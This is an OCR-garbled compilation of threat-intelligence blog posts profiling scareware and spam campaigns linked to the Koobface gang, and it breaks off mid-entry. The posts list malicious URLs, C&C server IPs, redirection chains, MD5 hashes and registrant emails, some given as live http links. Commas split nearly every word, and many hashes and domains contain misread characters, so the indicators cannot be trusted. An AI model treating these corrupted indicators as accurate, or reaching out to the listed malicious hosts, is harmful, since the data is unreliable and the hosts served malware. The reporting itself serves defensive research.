hxxp://178.158.237.37/welcome.htm 


hxxp://178.165.13.17/home.htm 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (74.113.233.48): 


MD5: a3470a214ec34f7a0b9330e44af80714 
MD5: 31593f94936e63152d35ca682fb9ef0b 

MD5: eb003b7665b34f6ed3a7944e4254ad2d 
MD5: ed1c465beca9596a9031580d1093cb13 


MD5: cace61lddd8f8e30cf1f52f9ad6c66578 
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Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://home.mywebsearch.com - 74.113.233.48 
hxxp://akd.search.mywebsearch.com - 5.178.43.17 
hxxp://ak.imgfarm.com - 90.84.60.81 


hxxp://anx.mywebsearch.com - 74.113.233.187 


Related, malicious, MD5s, known, to, have, responded, to, the, same, malicious, C &C, 
server, IPs: 


MD5: 11ddcf7bd806c9ef24cc84a440629e68 
MD5: 8c1e63b34c678b48c63ba369239d5718 
MD5: 10b4c54646567dcee605f5c36bfa8f17 
MD5: 7O0dbce98f1d62c03317797a1ldd3da151 


MD5: ee00f47a51e91alf70a5c7a0086b7220 


Once, executed, a, sample, malware (MD5: 11ddcf7bd806c9ef24cc84a440629e68), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


http://78.62.197.14/online.hAtm 
http://89.46.92.232/welcome.htm 


http://89.46.92.232/login.htm 


Once, executed, a, sample, malware (MD5: 8c1e63b34c678b48c63ba369239d5718), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


http://109.251.217.207/home.htm 


http://109.251.217.207/login.htm 
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Once, executed, a, sample, malware, (MD5: 10b4c54646567dcee605f5c36bfa8f17), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


http://91.221.219.12/setup.htm 


Once, executed, a, sample, malware, (MD5: 70dbce98f1d62c03317797aldd3da151), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


http://89.229.4.22/install.htm 


http://89.229.4.22/default.htm 


Once, executed, a, sample, malware (MD5: ee00f47a51e91a1f70a5c7a0086b7220), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


http://89.229.4.22/install.htm 


http://89.229.4.22/default.htm 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 


12.6.10 Historical OSINT - Koobface Gang Utilizes, Google Groups, Serves, Scare- 
ware and Malicious Software (2016-12-25 19:58) 


In, a, cybercrime, ecosystem, dominated, by, malicious, software, releases, cybercriminals, 
continue, actively, populating, their, botnet’s, infected, populating, successfully, affecting, 
hundreds, of, thousands, of, users, globally, potentially, exposing, the, confidentiality, in- 
tegrity, and, availability, of, the, affected, hosts, to, a, multi-tude, of, malicious, software, 
further, spreading, malicious, software, further, earning, fraudulent, revenue, in, the, process, 
of, monetizing, access, to, malware-infected, hosts, largely, relying, on, the, utilization, of, an, 
affiliate-network, based, type, of, monetization, scheme. 


We've, recently, intercepted, a, currently, circulating, malicious, soam, campaign, affect- 
ing, Google Groups, potentially, exposing, users, to, a, multi-tude, of, malicious, software, 
including, fake, security, software, also, Known, as, scareware, further, enticing, users, into, 
interacting, with, the, bogus, links, potentially, exposing, their, devices, to, a, multi-tude, of, 
malicious, software. 
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In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, in- 
frastructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, 
the, cybercriminals, behind, it, and, establish, a, direct, connection, between, the, campaign, 
and, the, Koobface, gang. 


Related, malicious, rogue, content, URLs, known, to, have, participated, in, the, cam- 
paign: 


- anisimivachev17 - 1125 messages 

- ilariongrishelev24 - 1099 messages 

- yuvenaliyarzhannikov15 - 1108 messages 
- burniemetheny52 - 1035 messages 

- mengrug - 1090 messages 


- Silabobrov27 - 1116 messages 


Related, malicious, URIs, known, to, have, participated, in, the, campaign: 
hxxp://wut.im/343535 
hxxp://tpal.us/wedding2 
hxxp://shrtb.us/New _year video 
hxxp://snipurl.com/tx2r6 
hxxp://www.tcp3.com/helga-4315 
hxxp://budurl.com/egph 
hxxp://flipto.com/jokes/ 
hxxp://rejoicetv.info/newyear 
hxxp://fauz.me/?livetv 
hxxp://go2.vg/funnykids 
hxxp://usav.us/anecdotes 


hxxp://vaime.org/joke 
5468 


hxxp://theflooracle.com/mistakes 
hxxp://dashurl.com/video-jokes 
hxxp://www.shortme.info/smileykids/ 
hxxp://starturl.com/clip32112 
hxxp://starturl.com/rebeca 
hxxp://starturl.com/video2231 
hxxp://starturl.com/funclip 
hxxp://starturl.com/sexchat 
hxxp://snipurl.com/tx2r6 
hxxp://www.41z.com/animals 
hxxp://www.rehttp.com/?smileykids 
hxxp://starturl.com/adamaura 
hxxp://mytinyurls.com/wfj 


hxxp://budurl.com/egph 


Sample, detection, rate, for, a, malicious, executable: 


MD5: 1e0d06095a32645c3f57flb4dcbcfe5c 


Sample, malicious, URL, involved, in, the, campaign: 


hxxp://newsekuritylist.com/index.php?affid=92600 - 213.163.89.56 - 
Bobby.].Hyatt@gmail.com 


Parked there are also: 


hxxp://networkstabilityinc .com - Email: juliacanderson@pookmail.com; marcusmhuf- 
faker@mailinator.com; justinpnelson@dodgit.com 


hxxp://indiansoftwareworld .com - Email: thelmamhandley@trashymail.com; — lean- 
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ngscofield@gmail.com; ernestygresham@trashymail.com 


hxxp://antyvirusdevice .com - Email: latonyawmiller@pookmail.com; royawi- 
ley@pookmail.com; gracegoshea@pookmail.com; latonyawmiller@pookmail.com 


hxxp://digitalprotectionservice .com - Email: clarencepfetter@trashymail.com; jamesdrobin- 
son@pookmail.com; jamesdrobinson@pookmail.com; clarencepfetter@trashymail .com 


hxxp://bestantyvirusservice .com - Email: kathrynrsmith@gmail.com; richardb- 
hughey@gmail.com; joshuamwest@trashymail.com; kathrynrsmith@gmail.com 


hxxp://antivirussoftrock .com - Email: michaelaturner@trashymail.com; gracem- 
parker@trashymail.com; cliffordsfernandez@pookmail.com; michaelaturner@trashymail.com 


hxxp://antywiramericasell .com - Email: Shannon.J.Ferguson@gmail.com 


hxxp://antydetectivewaemergencyroom .com - Email: brettdpetro@gmail.com; __va- 
leriejweaver@dodgit.com; williekharris@mailinator.com; brettdpetro@gmail.com 


hxxp://freeinternetvacation .com - Email: edwardmyoung@trashymail.com; aileenasay- 
lor@gmail.com; williamjoverby@trashymail.com; edwardmyoung@trashymail.com 


hxxp://aolbillinghq .com - Email: haroldamccarthy@trashymail.com; teodor- 
omkeller@trashymail.com; joanswhite@dodgit.com; haroldamccarthy@trashymail.com 


hxxp://scanserviceprovider .com - Email: rogerdmurphy@gmail.com; charlesc- 
valentino@mailinator.com; eliarmcdonald@trashymail.com; rogerdmurphy@gmail.com 


hxxp://securitytoolsquotes .com - Email: thurmanepidgeon@dodgit.com;  jessicap- 
grady@dodgit.com; jamesmcummings@trashymail.com; thurmanepidgeon@dodgit.com 


hxxp://electionprogress .com = ~- _— Email: clarenceafloyd@pookmail.com; juner- 
wurth@pookmail.com; edjbaxter@gmail.com; clarenceafloyd@pookmail.com 


hxxp://myantywiruslist .com - Email: Nathan.S.Dennis@gmail.com 
hxxp://antyspywarelistnow .com - Email: James.M.Miller@gmail.com 
hxxp://securitylabtoday .com - Email: Marc.N.Torres@gmail.com 


hxxp://yournecessary .com - Email: debrahbettis@gmail.com; myracbryant@dodgit.com; 
marycwilliams@dodgit.com; debrahbettis@gmail.com 


hxxp://securityutilitysite .net - Email: michellemwelch@mailinator.com; —charlesdfra- 
zier@trashymail.com; rosaliejnumphrey@pookmail.com; michellemwelch@mailinator.com 


hxxp://securitytoolsshop .net - Email: sarajgunter@gmail.com; kerstinrbray@gmail.com; 
keithrdejesus@mailinator.com; sarajgunter@gmail.com 


hxxp://securitytooledit .net - Email: byronlross@pookmail.com; jamesslewis@mailinator.com; 
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leighschancey@trashymail.com; byronlross@pookmail.com 


hxxp://portsecurityutility .net - Email: marquettacpettit@trashymail.com; melindak- 
bolin@pookmail.com; rhondaehipp@mailinator.com; marquettacpettit@trashymail.com 


Sample, detection, rate, for, a, malicious, executable: 
MD5: 4a3e8b6b7f42df0f26e22faafaa0327f 


MD5: 64a111acdc77762f261b9f4202e98d29 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://newsekuritylist.com/in.php?affid=92600 


hxxp://newsekuritylist.com/in.php?affid=92600 


Sample, URL, redirection, chain: 
hxxp://rejoicetv.info/newyear 
- hxxp://91.207.4.19/tds/go.php?sid=3 


- hxxp://liveeditionpc.net?uid=297 &pid=3 &ttl=11845621a62 - 95.169.187.216 - korn989.net; 
liveeditionpc.net; createpc-pcscan-korn.net 


- hxxp://www1.hotcleanofyour-pc.net/o=== - 98.142.243.174 - live-guard-forpc.net is also 
parked there: 


Sample, detection, rate, for, a, malicious, executable: 


MD5: 4912961c36306d156e4e2b6335c51151b 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://update2.pcliveguard.com/index.php?controller=hash - 124.217.251.99 


hxxp://update2.pcliveguard.com/index.php?controller=microinstaller &abbr=PCLG &setup- 
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Type=xp &ttl=210475833d3 &pid= 


hxxp://update2.pcliveguard.com/index.php?controller=microinstaller &abbr=PCLG &setup- 
Type=xp &ttl=210475833d3 &pid= 


hxxp://securityearth.cn/Reports/MicroinstallServiceReport.php - 210.56.53.125 


Sample, URL, redirection, chain: 
hxxp://garlandvenit.150m.com 

- hxxp://online-style2.com 

- hxxp://scanner-malware15.com/scn3/?engine= 


- hxxp://scanner-malware15.com/download.php?id=328s3 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://eclipserisa.150m.com 

hxxp://adamaura.150m.com 

hxxp://hugodinah.150m.com 

hxxp://roycesylvia.150m.com 

hxxp://lindaagora.150m.com 

hxxp://sharolynpam.150m.com 

hxxp://letarebeca.150m.com 


hxxp://letarebeca.150m.com 


Sample, URL, redirection, chain: 
hxxp://egoldenglove.com/Images/bin/movie/ 


- hxxp://egoldenglove.com/Images/bin/movie/Flash Update _1260873156.exe 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
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server, IPs: 


hxxp://2-weather.com/?pid=328s03 &sid=3593b2 &d=3 &name=Loading %20video - 
66.197.160.104 -mail@tatrum-verde.com 


hxxp://scanner-spya8.com/scn3/?engine= - info@gainweight.com - 


Sample, detection, rate, for, a, malicious, executable: 


MD5: bfaba92c3cOeaec61679f03ff0eb0911 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://91.212.226.185/download/winlogo.bmp (windowsaltserver.com) 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://2-coat.com - 193.104.22.202 - Email: mail@tatrum-verde.com 


hxxp://2-weather.com - 193.104.22.202 - - Email: mail@tatrum-verde.com - currently 
embedded on Koobface-infected hosts pushing scareware 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://online-style2.com - 66.197.160.104 - Email: mail@tatrum-verde.com 


hxxp://scanner-malware15.com - Email: info@natural-health.org 


Related, malicious, IPs, known, to, have, participated, in, the, campaign: 
hxxp://68.168.212.142 
hxxp://91.212.226.97 


hxxp://66.197.160.105 


Parked on 68.168.212.142: 
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hxxp://antispywareguide20 .com - Email: contacts@vertigo.us 
hxxp://antispywareguide22 .com - Email: contacts@vertigo.us 
hxxp://antispywareguide23 .com - Email: contacts@vertigo.us 
hxxp://antispywareguide25 .com - Email: contacts@vertigo.us 
hxxp://antispywareguide27 .com - Email: contacts@vertigo.us 
hxxp://antispywaretools10 .com - Email: contacts@vertigo.us 
hxxp://antispywaretools11 .com - Email: contacts@vertigo.us 
hxxp://antispywaretools12 .com - Email: contacts@vertigo.us 
hxxp://antispywaretools17 .com - Email: contacts@vertigo.us 
hxxp://antispywaretools18 .com - Email: contacts@vertigo.us 
hxxp://best-scan-911 .com - Email: TheodoreWTurner@live.com 
hxxp://best-scan-921 .com - Email: TheodoreWTurner@live.com 
hxxp://best-scan-931 .com - Email: TheodoreWTurner@live.com 
hxxp://best-scan-951 .com - Email: TheodoreWTurner@live.com 
hxxp://best-scan-961 .com - Email: TheodoreWTurner@live.com 
hxxp://birthday-gifts2 .com - Email: TheodoreWTurner@live.com 
hxxp://christmasdecoration2 .com - Email: contact@trythreewish.us 
hxxp://computerscanmO .com - Email: JamesNTurner@yahoo.com 
hxxp://computerscanm2 .com - Email: JamesNTurner@yahoo.com 
hxxp://computerscanm4 .com - Email: JamesNTurner@yahoo.com 
hxxp://computerscanm6 .com - Email: JamesNTurner@yahoo.com 
hxxp://computerscanm8 .com - Email: JamesNTurner@yahoo.com 
hxxp://go-scan021 .com - Email: TheodoreWTurner@live.com 
hxxp://go-scan061 .com - Email: TheodoreWTurner@live.com 


hxxp://go-scan081 .com - Email: TheodoreWTurner@live.com 
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hxxp://go-scan091 .com - Email: TheodoreWTurner@live.com 


hxxp://go-scan121 .com - Email: TheodoreWTurner@live.com 


hxxp://microscannerl .com - Email: info@enigmazero.com 
hxxp://micro-scannerl .com - Email: info@enigmazero.com 
hxxp://microscanner2 .com - Email: info@enigmazero.com 
hxxp://micro-scanner2 .com - Email: info@enigmazero.com 
hxxp://microscanner3 .com - Email: info@enigmazero.com 
hxxp://micro-scanner3 .com - Email: info@enigmazero.com 
hxxp://microscanner4 .com - Email: info@enigmazero.com 
hxxp://micro-scanner4 .com - Email: info@enigmazero.com 
hxxp://microscanner5 .com - Email: info@enigmazero.com 
hxxp://micro-scanner5 .com - Email: info@enigmazero.com 
hxxp://micro-scanneral .com - Email: info@enigmazero.com 
hxxp://micro-scannerb1 .com - Email: info@enigmazero.com 
hxxp://micro-scannercl .com - Email: info@enigmazero.com 
hxxp://micro-scannerd1 .com - Email: info@enigmazero.com 
hxxp://pc-antispyo3 .com 

hxxp://pc-antispyo5 .com 

hxxp://pc-antispyo6 .com 

hxxp://pc-antispyo9 .com 

hxxp://pc-securityv8 .com - Email: info@billBlog.com 
hxxp://protect-pcal .com 

hxxp://protect-pcrl .com 


hxxp://protect-pctl .com 
5475 


hxxp://protect-pcul .com 


hxxp://quick-antispy91 .com - Email: williams.trio@yahoo.com 
hxxp://quick-antispy92 .com - Email: williams.trio@yahoo.com 
hxxp://quick-antispy93 .com - Email: williams.trio@yahoo.com 
hxxp://quick-antispy95 .com - Email: williams.trio@yahoo.com 
hxxp://quick-antispy99 .com - Email: williams.trio@yahoo.com 
hxxp://quick-scanner2 .com - Email: williams.trio@yahoo.com 
hxxp://quick-scanner4 .com - Email: williams.trio@yahoo.com 
hxxp://quick-scanner6 .com - Email: williams.trio@yahoo.com 
hxxp://quick-scanner77 .com - Email: williams.trio@yahoo.com 
hxxp://quick-scanner78 .com - Email: williams.trio@yahoo.com 
hxxp://run-scanner023 .com - Email: TheodoreWTurner@live.com 
hxxp://run-scanner056 .com - Email: TheodoreWTurner@live.com 
hxxp://run-scanner067 .com - Email: TheodoreWTurner@live.com 
hxxp://safe-pc0O1 .com - Email: JamesNTurner@yahoo.com 
hxxp://safe-pc02 .com - Email: JamesNTurner@yahoo.com 
hxxp://safe-pc03 .com - Email: JamesNTurner@yahoo.com 
hxxp://safe-pc07 .com - Email: JamesNTurner@yahoo.com 
hxxp://safe-pc09 .com - Email: JamesNTurner@yahoo.com 
hxxp://safe-your-pc002 .com - Email: JamesNTurner@yahoo.com 
hxxp://safe-your-pc004.com - Email: JamesNTurner@yahoo.com 
hxxp://safe-your-pc009 .com - Email: JamesNTurner@yahoo.com 
hxxp://scan-and-secureO1 .com 


hxxp://scan-and-secure04 .com 
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hxxp://scan-and-secure06 .com 
hxxp://scan-and-secure07 .com 
hxxp://scan-and-secure09 .com 
hxxp://scan-computerab .com 


hxxp://scan-computereO .com 


hxxp://scanner-malware0O1 .com - Email: info@natural-health.org 


hxxp://scanner-malwareO02 .com - Email: info@natural-health.org 


hxxp://scanner-malware04 .com - Email: info@natural-health.org 


hxxp://scanner-malware05 .com - Email: info@natural-health.org 


hxxp://scanner-malware06 .com - Email: info@natural-health.org 


hxxp://scanner-malwarell .com - Email: info@natural-health.org 


hxxp://scanner-malware12 .com - Email: info@natural-health.org 


hxxp://scanner-malware13 .com - Email: info@natural-health.org 


hxxp://scanner-malwarel14 .com - Email: info@natural-health.org 


hxxp://scanner-malware15 .com - Email: info@natural-health.org 


hxxp://securitysoftwarel .com 
hxxp://securitysoftware3 .com 
hxxp://securitysoftware5 .com 
hxxp://securitysoftwaree .com 
hxxp://securitysoftwaree7 .com 
hxxp://security-softwareol .com 
hxxp://security-softwareo5 .com 


hxxp://security-softwareo7 .com 


hxxp://unique-gifts2 .com - Email: 


contact@trythreewish.us 
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hxxp://unusual-gifts2 .com - Email: contact@trythreewish.us 


hxxp://xmas-song .com - Email: contact@trythreewish.us 


Parked on 91.212.226.97; 66.197.160.105: 


hxxp://best-scan-911 .com - Email: TheodoreWTurner@live.com 


hxxp://best-scan-921 .com - Email: TheodoreWTurner@live.com 


hxxp://best-scan-931 .com - Email: TheodoreWTurner@live.com 


hxxp://best-scan-951 .com - Email: TheodoreWTurner@live.com 


hxxp://best-scan-961 .com - Email: TheodoreWTurner@live.com 


hxxp://go-scan021 .com - Email: 
hxxp://go-scan061 .com - Email: 
hxxp://go-scan081 .com - Email: 
hxxp://go-scan091 .com - Email: 


hxxp://go-scan121 .com - Email: 


TheodoreWTurner@live.com 
TheodoreWTurner@live.com 
TheodoreWTurner@live.com 
TheodoreWTurner@live.com 


TheodoreWTurner@live.com 


hxxp://microscannerl .com - Email: info@enigmazero.com 


hxxp://micro-scannerl .com - Email: info@enigmazero.com 


hxxp://microscanner2 .com - Email: info@enigmazero.com 


hxxp://micro-scanner2 .com - Email: info@enigmazero.com 


hxxp://microscanner3 .com - Email: info@enigmazero.com 


hxxp://micro-scanner3 .com - Email: info@enigmazero.com 


hxxp://microscanner4 .com - Email: info@enigmazero.com 


hxxp://micro-scanner4 .com - Email: info@enigmazero.com 


hxxp://microscanner5 .com - Email: info@enigmazero.com 


hxxp://micro-scanner5 .com - Email: info@enigmazero.com 
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hxxp://micro-scanneral .com - Email: info@enigmazero.com 


hxxp://micro-scannerbl1 .com - Email: info@enigmazero.com 


hxxp://micro-scannercl .com - Email: info@enigmazero.com 


hxxp://micro-scannerdl .com - Email: info@enigmazero.com 


hxxp://run-scanner023 .com - Email: TheodoreWTurner@live.com 


hxxp://run-scanner056 .com - Email: TheodoreWTurner@live.com 


hxxp://run-scanner067 .com - Email: TheodoreWTurner@live.com 


hxxp://scanner-malware01 
hxxp://scanner-malware02 
hxxp://scanner-malware04 
hxxp://scanner-malware05 
hxxp://scanner-malware06 
hxxp://scanner-malware11 
hxxp://scanner-malware12 
hxxp://scanner-malware13 
hxxp://scanner-malware14 


hxxp://scanner-malware15 


Parked on 66.197.160.104: 


.com - Email: 


.com - Email: 


.com - Email: 


.com - Email: 


.com - Email: 


.com - Email: 


.com - Email: 


.com - Email: 


.com - Email: 


.com - Email: 


info@natural-health.org 
info@natural-health.org 
info@natural-health.org 
info@natural-health.org 
info@natural-health.org 
info@natural-health.org 
info@natural-health.org 
info@natural-health.org 
info@natural-health.org 


info@natural-health.org 


hxxp://2activities.com - Email: mail@tatrum-verde.com 


hxxp://2-scenes.com - Email: mail@tatrum-verde.com 


hxxp://2-weather.com - Email: mail@tatrum-verde.com 


hxxp://online-fun2 .com - Email: mail@tatrum-verde.com 


hxxp://online-news2.com - Email: mail@tatrum-verde.com 


hxxp://online-style2 .com - Email: mail@tatrum-verde.com 
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hxxp://online-tv2.com - Email: mail@tatrum-verde.com 
hxxp://snow-and-fun2 .com - Email: mail@tatrum-verde.com 
hxxp://winterart2 .com - Email: info@territoryplace.us 
hxxp://winterchristmas2 .com - Email: info@territoryplace.us 
hxxp://wintercrafts2 .com - Email: info@territoryplace.us 
hxxp://winterkids2 .com - Email: info@territoryplace.us 
hxxp://winterphotos2 .com - Email: info@territoryplace.us 
hxxp://winterpicture2 .com - Email: info@territoryplace.us 
hxxp://winterscene2 .com - Email: info@territoryplace.us 


hxxp://winterwallpaper2 .com - Email: info@territoryplace.us 


What’s particularly, interesting, about, this, particular, campaign, is, the, direct, connec- 
tion, with, the, Koobface, gang, taking, into, consideration, the, fact, that, hxxp://redirector 
online-style2.com/?pid=312s03 &sid=4db12f has, also, been, used, by, Koobface-infected 
hosts, and, most, importantly, the, fact, that, a, sampled, scareware, campaign from Decem- 
ber 2009, were serving scareware parked on 193.104.22.200, where the Koobface scareware 
portfolio is parked, as, previously, profiled, and, analyzed. 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 


Related posts: 


[1]Historical OSINT - Celebrity-Themed Blackhat SEO Campaign Serving Scareware and 
the Koobface Botnet Connection 


[2]The Koobface Gang Wishes the Industry "Happy Holidays" 
[3]Koobface Gang Responds to the "10 Things You Didn’t Know About the Koobface Gang Post" 
[4]How the Koobface Gang Monetizes Mac OS X Traffic 


[5]Koobface Botnet’s Scareware Business Model - Part Two 
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[6]Koobface Botnet’s Scareware Business Model 

[7]From the Koobface Gang with Scareware Serving Compromised Site 
[8]Koobface Botnet Starts Serving Client-Side Exploits 
[9]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[10]Dissecting Koobface Gang’s Latest Facebook Spreading Campaign 
[11]Koobface - Come Out, Come Out, Wherever You Are 
[12]Dissecting Koobface Worm’s Twitter Campaign 

[13]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[14]Koobface Botnet Dissected in a TrendMicro Report 

[15]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[16]Movement on the Koobface Front - Part Two 

[17]Movement on the Koobface Front 

[18]Dissecting the Koobface Worm’s December Campaign 

[19]The Koobface Gang Mixing Social Engineering Vectors 


[20]Dissecting the Latest Koobface Facebook Campaign 


1. http: //ddanchev. blogspot .com/2016/12/historical-osint-celebrity-themed.htm 

2. http: //ddanchev. blogspot . com/2009/12/koobface-gang-wishes-industry-happy.htm 

3. http: //ddanchev . blogspot . com/2010/05/koobface- gang-responds-to-10-things-you html 
4. http://ddanchev. blogspot . com/2010/02/how- koobface-gang-monetizes-mac-os-x.htm 

5. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.htm 

6. http: //ddanchev. blogspot . com/2009/09/koobface-botnets-scareware-business .htm 
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8. http: //ddanchev. blogspot . com/2009/11/koobface-botnet-starts-serving-client.htm 

9. http: //ddanchev. blogspot .com/2009/12/koobface-friendly-riccom-1td-as29550.htm 


10. http://ddanchev. blogspot .com/2010/04/dissect ing-koobface-gangs-latest .htm 
11. http://ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter.htm 


12. http://ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter.htm 
13. http://ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 


14. http://ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 
15. http: //ddanchev. blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 
16. http://ddanchev. blogspot .com/2009/08/movement-on-koobface-front-part-two.htm 


17. bttp://ddanchev. blogspot .com/2009/08/movement-on-koobface-front .htm 
18. http://ddanchev. blogspot .com/2008/12/dissecting-koobface-worms-december .htm 


# 


ttp://ddanchev. blogspot .com/2008/12/koobface-gang-mixing- social-engineering. html 


20. http://ddanchev.blogspot .com/2008/11/dissecting-latest-koobface-facebook.htm 
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12.6.11 Historical OSINT - Hundreds of Malicious Web Sites Serve Client-Side Ex- 
ploits, Lead to Rogue YouTube Video Players (2016-12-25 21:47) 


In, a, cybercrime, ecosystem, dominated, by, hundreds, of, malicious, software, releases, 
cybercriminals, continue, actively, populating, a, botnet’s, infected, population, further, 
spreading, malicious, software, potentially, compromising, the, confidentiality, integrity, and, 
availability, of, the, affected, hosts, potentially, exposing, the, affected, user, to, a, multi-tude, 
of, malicious, software, further, earning, fraudulent, revenue, in, the, process, of, monetizing, 
the, access, to, the, malware-infected, hosts, largely, relying, on, the, use, of, affiliate-network, 
based, type, of, fraudulent, revenue, monetization, scheme. 


We've, recently, intercepted, a, currently, circulating, malicious, soam, Campaign, enticing, 
users, into, clicking, on, bogus, and, rogue, links, potentially, exposing, the, confidentiality, 
integrity, and, availability, of, the, affected, hosts, ultimately, attempting, to, socially, en- 
gineer, users, into, interacting, with, rogue, YouTube, Video, Players, ultimately, dropping, 
fake, security, software, also, Known, as, scareware, on, the, affected, hosts, with, the, 
cybercriminals, behind, the, campaign, actively, earning, fraudulent, revenue, largely, relying, 
on, the, utilization, of, an, affiliate-network, based, type, of, monetization, scheme. 


In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, in- 
frastructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, 
the, cybercriminals, behind, it. 


Sample, URL, redirection, chain: 

hxxp://acquaintive.in/x.html - 208.87.35.103 

- hxxp://xxxvideo-hlyl.cz.cc/video7/?afid=24 - 63.223.117.10 

- hxxp://binarymode.in/topic/j.php - 159.148.117.21 - Email: enquepuedo.senior@gmail.com 
- hxxp://binarymode.in/topic/exe.php?x=jjar 


- hxxp://binarymode.in/topic/?showtopic=ecard &bid=151 &e=post &done=image 


Related, malicious, MD5s, known, to, have, responded, to, the, same, C &C, server, IPs 
(208.87.35.103): 


MD5: a12c055f201841f4640084a70b34c0c4 


MD5: b4d435f15d094289839eac6228088baf 
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MD5: 2782220da587427b981f07dc3e3e0d96 
MD5: 1151cd39495c295975b8c85bd4b385e5 


MD5: 2539d5d836f058afbbf03cb24e41970c 


Once, executed, a, sample, malware (MD5: a12c055f201841f4640084a70b34c0c4), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://926garage.com - 185.28.193.192 
hxxp://quistsolutions.eu - 188.165.239.53 
hxxp://rehabilitacion-de-drogas.org - 188.240.1.110 
hxxp://bcbrownmusic.com - 69.89.21.66 
hxxp://andziOl.5v.pl - 46.41.150.7 


hxxp://alsaei.com - 192.186.194.133 


Once, executed, a, sample, malware (MD5: 2782220da587427b981f07dc3e3e0d96), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://lafyeri.com 
hxxp://kulppasur.com - 209.222.14.3 
hxxp://toalladepapel.com.ar - 184.168.57.1 


hxxp://www.ecole-saint-simon.net - 208.87.35.103 


Once, executed, a, sample, malware (MD5: 2539d5d836f058afbbf03cb24e41970c), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://realquickmedia.com (208.87.35.103) 


Related, malicious, domains, known, to, have, responded, to, the, same, malicious, C 
&C, server, IPs (109.74.195.149): 


hxxp://trustidsoftware.com 


5483 


hxxp://tc28q8cxl2a5ljwa60skI87w6.cdx1lcdx1cdx1.in 
hxxp://golubu6ka.com 

hxxp://cdx2cdx2cdx2.in 

hxxp://redmewire.com 
hxxp://5zw3t6jq8fiv9jtdqg23.cdx2cdx2cdx2.in 
hxxp://es3iz6lbOpet3ix6la0p.cdx2cdx2cdx2.in 
hxxp://qsd79bd0j8f7c90e057a.cdx1cdx1cdx1.in 
hxxp://w8ncqpet2hx5kf9mbria.cdx1cdx1cdx1.in 
hxxp://skygaran4ik.com 
hxxp://5xj7wk9amqcpse2ug4ve.cdx1cdx1cdx1.in 
hxxp://readrelay.com 
hxxp://ok5sbm7xgo6vk0e6b3xc.cdx1cdx1cdx1.in 
hxxp://d51flqam8wil5wpxmtjqg.cdx2cdx2cdx2.in 
hxxp://wxvtsr98642pomligfed.cdx2cdx2cdx2.in 
hxxp://zonkjhgebawzvsq09753.cdx1cdx1cdx1.in 


hxxp://nightphantom.com 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (109.74.195.149): 


MD5: a6c06a59da36eelae9O6ffaff3 7d12f28 

MD5: 2d1bb6ca54f4c093282ea30e2096af0f 
MD5: adf037ecbd4e7af573ddeb7794b61c40 
MD5: ce7d4a493fc4b3c912703f084d0d61el 


MD5: c36941693eeef3fa54ca486044c6085a 


Once, executed, a, sample, malware (MD5:a6c06a59da36ee1lae96ffaff37d12f28), phones, 
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back, to, the, following, malicious, C &C, server, IPs: 
hxxp://replost.com - 109.74.195.149 


hxxp://zeplost.com - 109.74.195.149 


Once, executed, a, sample, malware (MD5:2d1bb6ca54f4c093282ea30e2096af0f), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://qweplost.com - 109.74.195.149 


Related, malicious, domains, known, to, have, responded, to, the, same, malicious, C 
&C, server, IPs (96.126.106.156): 


hxxp://checkwebspeed.net 
hxxp://gercourses.com 
hxxp://replost.com 
hxxp://boltoflexaria.in 
hxxp://levartnetcom.net 
hxxp://boltoflex.in 
hxxp://borderspot.net 
hxxp://diathbsp.in 
hxxp://ganzagroup.in 
hxxp://httpsstarss.in 
hxxp://missingsync.net 
hxxp://qqplot.com 
hxxp://evelice.in 
hxxp://gotheapples.com 
hxxp://surfacechicago.net 


hxxp://zeplost.com 
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Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 


&C, server, IPs: 

MD5: 0183a687365cc3eb97bb5c2710952f95 
MD5: f1e3030a83fa2f14f271612a4de914cb 

MD5: 97269450de58ef5fb8d449008e550bf0 
MD5: c83962659f6773b729aa222bd5b03f2f 


MD5: e0aa08d4d98c3430204c1bb6f4c980e1 


Once, executed, a, sample, malware (MD5:0183a687365cc3eb97bb5c2710952f95), 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://replost.com - 96.126.106.156 


Once, executed, a, sample, malware (MD5:f1e3030a83fa2f14f271612a4de914cb), 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://gercourses.com/borders.php 


Once, executed, a, sample, malware (MD5:97269450de58ef5fb8d449008e550bf0), 
